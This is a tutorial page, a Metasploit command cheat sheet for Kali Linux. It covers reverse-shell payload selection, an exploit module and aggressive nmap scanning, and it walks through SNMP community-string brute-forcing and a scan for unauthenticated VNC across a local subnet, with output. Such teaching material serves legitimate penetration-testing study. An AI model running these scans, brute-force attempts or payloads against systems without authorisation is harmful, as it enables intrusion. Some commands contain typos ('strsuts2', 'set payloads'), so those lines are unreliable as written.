How to Use Metasploit with Kali Linux β Complete Guide
- Last updated: Apr 12, 2024
Metasploit Framework is an exploitation toolkit which allows you to develop or execute exploit code against a remote target machine.
It comes pre-installed with Kali Linux.
- It gives access to several types of modules:
- Exploit: proof of concept code developed to take advantage of a particular vulnerability in a target system
- Payload: malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system
- Auxiliaries: set of tools developed to perform scanning, sniffing, wardialling, fingerprinting, etc…
- Encoders: provided to evade the detection of antivirus, firewall, IDS/IPS and other malware defenses by encoding the payload during penetration testing operation
- Link to the Vulnerability & Exploit Database: https://www.rapid7.com/.
- Kali Linux Release: 2022.2
Commands
Main
- Enter the msf console line interface:
kali@kali:~$ sudo msfconsole
- List all available commands :
msf6 > help
- Display auxiliary modules :
msf6 > show auxiliary
- Display the exploits available within the framework:
msf6 > show exploits
- Display payloads:
msf6 > show payloads
- Display encoders:
msf6 > show encoders
- Display NOP generators:
msf6 > show nops
- Display settings and options available for specific module:
msf6 > show options
- Display list of target OS supported:
msf6 > show targets
- Display global options for one or more modules:
msf6 > show options
- Move back from the current context:
msf6 > back
- Displays and manage jobs:
msf6 > jobs
- netcat or telnet tools equivalent:
msf6 > connect [ip] [port]
PostgreSQL Database
Metasploit Framework can works with PostgreSQL to save port and vulnerability scanning.
- Enter to msf console line interface :
kali@kali:~$ sudo msfconsole
- Initialize, Start and Connect :
msf6 > msfdb init
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
- Show the current database service status :
msf6 > db_status
- List all hosts in the database :
msf6 > hosts
- List all services in the database :
msf6 > services
Search
- Search for linux and exploit type:
msf6 > search name:linux type:exploit
- Apply tcp filter on a linux search:
msf6 > grep tcp search name:linux
Info
- Get exploit information:
msf6 > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Set
- Set payload attack:
msf6 > set payloads payload/linux/x64/shell_reverse_tcp
- Set variable:
msf6 > set RHOST kali.shebangthedolphins.net
- Set a global variable to a value:
msf6 > setg RHOST kali.shebangthedolphins.net
- Unset variable:
msf6 > unset RHOST
msf6 > unsetg RHOST
msf6 > unset all
Use
- Use specific exploit:
msf6 > use exploit/multi/http/strsuts2_namespace_ognl
Scans
- Execute nmap scan and records output to database:
msf6 > db_nmap -T Aggressive -sV -n -O -v kali.shebangthedolphins.net
Exploit
- Test and verifies exploit:
msf6 > check
- Launch exploit:
msf6 > exploit
Auxiliary
- Launches auxiliary:
msf6 > run
Examples
Scenario 1 : SNMP
- Search for snmp:
msf6 > grep -i community search snmp
24 auxiliary/scanner/snmp/snmp_login normal No SNMP Community Login Scanner
- Select auxiliary:
msf6 > use auxiliary/scanner/snmp/snmp_login
- Display auxiliary settings:
msf6 auxiliary(scanner/snmp/snmp_login) > show options
odule options (auxiliary/scanner/snmp/snmp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no The password to test
PASS_FILE /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt no File containing communities, one per line
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 161 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USER_AS_PASS false no Try the username as the password for all users
VERBOSE true yes Whether to print output for all attempts
VERSION 1 yes The SNMP version to scan (Accepted: 1, 2c, all)
- Set RHOSTS variable to scan 192.168.1.0/24 network:
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
- Set THREADS variable to 254:
msf6 auxiliary(scanner/snmp/snmp_login) > set THREADS 254
THREADS => 254
- Start the scan:
msf6 auxiliary(scanner/snmp/snmp_login) > run
[+] SNMP: 192.168.1.2 community string: 'public' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'public' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[+] SNMP: 192.168.1.2 community string: 'private' info: 'GSM7224 L2 Managed Gigabit Switch'
[+] SNMP: 192.168.1.199 community string: 'private' info: 'HP ETHERNET MULTI-ENVIRONMENT'
[*] Validating scan results from 2 hosts...
[*] Host 192.168.1.199 provides READ-WRITE access with community 'internal'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.199 provides READ-WRITE access with community 'public'
[*] Host 192.168.1.2 provides READ-WRITE access with community 'private'
[*] Host 192.168.1.2 provides READ-ONLY access with community 'public'
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Scenario 2 : VNC
We are searching for VNC servers on the 192.168.1.0/24 network that do not require a password.
- Search for VNC server:
msf6 > search vnc_none_auth
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/vnc/vnc_none_auth normal No VNC Authentication None Detection
- Select auxiliary:
msf6 > use auxiliary/scanner/vnc/vnc_none_auth
- Display auxiliary settings:
msf6 auxiliary(scanner/snmp/snmp_login) > show options
Module options (auxiliary/scanner/vnc/vnc_none_auth):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 5900 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
- Set RHOSTS variable to scan 192.168.1.0/24 network:
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
- Set THREADS variable to 254:
msf6 auxiliary(scanner/vnc/vnc_none_auth) > set THREADS 254
THREADS => 254
- Start exploit:
msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
[*] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server protocol version: 3.8
[*] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server security types supported: None
[+] 192.168.1.143:5900 - 192.168.1.143:5900 - VNC server security types includes None, free access!
[*] 192.168.1.0/24:5900 - Scanned 30 of 256 hosts (11% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 252 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 253 of 256 hosts (98% complete)
[*] 192.168.1.0/24:5900 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed